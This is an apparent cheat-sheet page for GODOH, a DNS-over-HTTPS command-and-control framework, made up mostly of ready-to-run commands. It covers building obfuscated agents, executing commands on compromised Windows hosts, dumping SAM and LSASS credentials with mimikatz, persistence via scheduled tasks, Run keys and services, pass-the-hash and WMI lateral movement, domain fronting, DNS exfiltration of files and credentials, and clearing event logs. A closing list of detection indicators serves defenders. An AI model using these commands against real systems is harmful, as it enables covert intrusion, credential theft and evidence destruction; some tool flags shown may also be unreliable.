Ir al contenido
1337skills 1337skills - Hojas de Trucos

GODOH

GODOH is a Go-based DNS-over-HTTPS (DoH) C2 framework for stealthy command exfiltration. It allows agents to communicate via DNS queries wrapped in HTTPS, evading traditional network monitoring.

Installation

Server Setup

# Clone repository
git clone https://github.com/sensepost/godoh.git
cd godoh

# Build server binary
go build -o godoh-server ./cmd/server

# Build agent binary
go build -o godoh-agent ./cmd/agent

# Alternatively, use Make
make build

Quick Start

# Start DoH server (requires DNS domain)
./godoh-server -o query.domain.com -d godoh.domain.com

# Start agent
./godoh-agent -d godoh.domain.com -c https://query.domain.com/dns-query

Server Configuration

DNS Provider Setup

# Configure for Google DoH
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -provider google

# Configure for Cloudflare DoH
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -provider cloudflare

# Custom DoH endpoint
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -doh-url https://custom.example.com/dns-query

Certificate Configuration

# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Start with TLS
./godoh-server \
  -tls-cert cert.pem \
  -tls-key key.pem \
  -o query.domain.com

Agent Generation

Basic Agent

# Generate HTTP agent
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query

# Save to binary
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query \
  -o agent.exe

Obfuscated Agent

# Build obfuscated executable
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.cloudflare.com/dns-query \
  -obfuscate \
  -o agent.exe

Cross-Platform Compilation

# Windows 64-bit
GOOS=windows GOARCH=amd64 go build -o agent.exe ./cmd/agent

# Windows 32-bit
GOOS=windows GOARCH=386 go build -o agent.exe ./cmd/agent

# Linux x86_64
GOOS=linux GOARCH=amd64 go build -o agent ./cmd/agent

# macOS
GOOS=darwin GOARCH=amd64 go build -o agent ./cmd/agent

Agent Communications

DNS Query Encoding

# Agent sends encoded data via DNS A record queries
# Example: AAAAAA.B.godoh.domain.com

# Where:
# AAAAAA = Base32-encoded command data
# B = Sequence number
# godoh.domain.com = Domain configured in agent

DoH Protocol

# Agent makes HTTPS POST to DoH endpoint
POST /dns-query HTTP/1.1
Host: dns.google
Content-Type: application/dns-message
Content-Length: 47

[Binary DNS message payload]

Response Handling

# Server returns encoded commands in DNS response
# Agent decodes response and executes commands
# Results encoded back into next DNS query

Command Execution

Shell Commands

# In agent shell
agent > execute whoami
agent > execute ipconfig /all
agent > execute tasklist /v

# PowerShell execution
agent > powershell Get-LocalUser
agent > powershell Get-Process

File Operations

# Download file from target
agent > download C:\Windows\System32\config\SAM

# Upload file to target
agent > upload /tmp/payload.exe C:\Windows\Temp\

# List directory
agent > ls C:\Users\

# Delete file
agent > rm C:\Temp\payload.exe

Process Management

# List running processes
agent > ps

# Kill process
agent > kill 1234

# Execute process
agent > execute cmd.exe /c "whoami"

# Process injection
agent > inject 1234 /tmp/shellcode.bin

Persistence Mechanisms

Scheduled Task

agent > execute schtasks /create /tn Update /tr C:\agent.exe /sc onstart /ru System

Registry Persistence

agent > execute powershell.exe -NoP -C "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update -Value C:\agent.exe"

Service Installation

agent > execute sc.exe create AgentService binPath= "C:\agent.exe"
agent > execute sc.exe start AgentService

Lateral Movement

Credentials Harvesting

# Dump LSASS
agent > execute tasklist /v | findstr lsass
agent > execute mimikatz.exe

# Dump SAM
agent > download C:\Windows\System32\config\SAM

# Extract cached creds
agent > execute powershell.exe -NoP -C "Get-ChildItem HKCU:\Software\Microsoft\Windows NT\CurrentVersion\CredentialManager"

Lateral Access

# Pass-the-Hash
agent > execute psexec -u DOMAIN\user -p hash \\target whoami

# WMI
agent > execute wmic /node:"target" /user:"DOMAIN\user" /password:"password" process call create "cmd.exe /c powershell -nop -c IEX(...)"

# RDP
agent > rdesktop -u DOMAIN\user -p password target.local

Defense Evasion

Traffic Obfuscation

# Use legitimate DoH providers (Google, Cloudflare)
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query

# Blend in with normal DoH traffic
# Small query sizes reduce detection likelihood

Timing Obfuscation

# Randomize DNS query intervals
agent > sleep 3600  # 1 hour

# Use exponential backoff
agent > jitter 0.5  # 50% jitter on intervals

Payload Obfuscation

# Build obfuscated binary
go build -ldflags="-s -w" -o agent.exe ./cmd/agent

# Strip symbols for smaller size
strip agent.exe

Data Exfiltration

File Exfiltration

# Download sensitive files
agent > download C:\Users\Administrator\Desktop\secret.docx
agent > download C:\Windows\System32\config\SAM
agent > download C:\Windows\System32\config\SYSTEM

# Download results get base32-encoded into DNS queries

Credential Exfiltration

# Dump and exfil credentials
agent > execute "powershell Get-Credential | Export-Clixml C:\Temp\creds.xml"
agent > download C:\Temp\creds.xml

# Exfil via small DNS chunks
# (GODOH splits large data across multiple DNS queries)

Command Output Exfiltration

# All command output is automatically exfiltrated via DNS
agent > execute dir C:\  # Output sent in DNS responses

# Large outputs chunked:
# Server splits into 255-character DNS TXT records
# Agent reassembles responses

Monitoring and Operations

Session Management

# List active agents
server > agents

# Interact with specific agent
server > agent <agent_id>

# Send command to agent
server > task execute whoami

# Check agent status
server > status <agent_id>

Log Review

# Enable verbose logging
./godoh-server -v -d godoh.domain.com

# Monitor incoming queries
./godoh-server -log /tmp/godoh.log -d godoh.domain.com

# Check DNS query patterns
tail -f /tmp/godoh.log | grep "DNS Query"

Performance Optimization

# Adjust buffer sizes for slow connections
./godoh-server \
  -buffer-size 512 \
  -d godoh.domain.com

# Increase timeout for unreliable networks
./godoh-agent \
  -d godoh.domain.com \
  -timeout 30s

Advanced Configuration

Domain Fronting

# Use legitimate domain for DoH endpoint
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query \
  -host-header google.com

# Hides true C2 domain in SNI/Host header

Multi-Domain Setup

# Configure multiple fallback domains
./godoh-agent \
  -d primary.domain.com,secondary.domain.com,tertiary.domain.com \
  -c https://dns.google/dns-query

# Rotates between domains for resilience

Custom DNS Server

# Run internal DNS server
./godoh-dns-server -d godoh.domain.com

# Route queries to custom server
./godoh-agent \
  -d godoh.domain.com \
  -nameserver 192.168.1.10:53

Troubleshooting

Connectivity Issues

# Test DNS resolution
nslookup test.godoh.domain.com

# Test DoH endpoint
curl -X POST https://dns.google/dns-query \
  -H "Content-Type: application/dns-message"

# Enable debug logging
./godoh-agent -debug -d godoh.domain.com

Slow Transfers

# Increase query rate
./godoh-agent \
  -d godoh.domain.com \
  -rate 100  # 100 queries per second

# Reduce data encoding overhead
./godoh-agent -compression gzip

Firewall Blocking

# If standard DoH blocked, use alternative endpoint
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.quad9.net/dns-query

# Alternative: use TCP port 853
./godoh-server -tcp -port 853

Detection and Cleanup

Remove Agent

# Remove scheduled task
agent > execute schtasks /delete /tn Update /f

# Remove registry entry
agent > execute powershell.exe -NoP -C "Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update"

# Delete agent binary
agent > rm C:\Windows\Temp\agent.exe

Clear Logs

# Clear Windows Event Log
agent > execute wevtutil cl System
agent > execute wevtutil cl Security
agent > execute wevtutil cl Application

# Clear DNS cache
agent > execute ipconfig /flushdns

Best Practices

  • Use legitimate DoH providers to blend with normal traffic
  • Implement DNS query randomization
  • Rotate domains regularly
  • Monitor for unusual DNS patterns
  • Use encryption for additional obfuscation
  • Implement proper OPSEC during operations
  • Clean up all artifacts post-operation

Detection Indicators

  • Unusual DNS query volume
  • Consistent DoH traffic to unusual endpoints
  • Base32/Base64-encoded DNS names
  • Regular DNS query timing patterns
  • Outbound HTTPS traffic on port 443 to unexpected IPs

References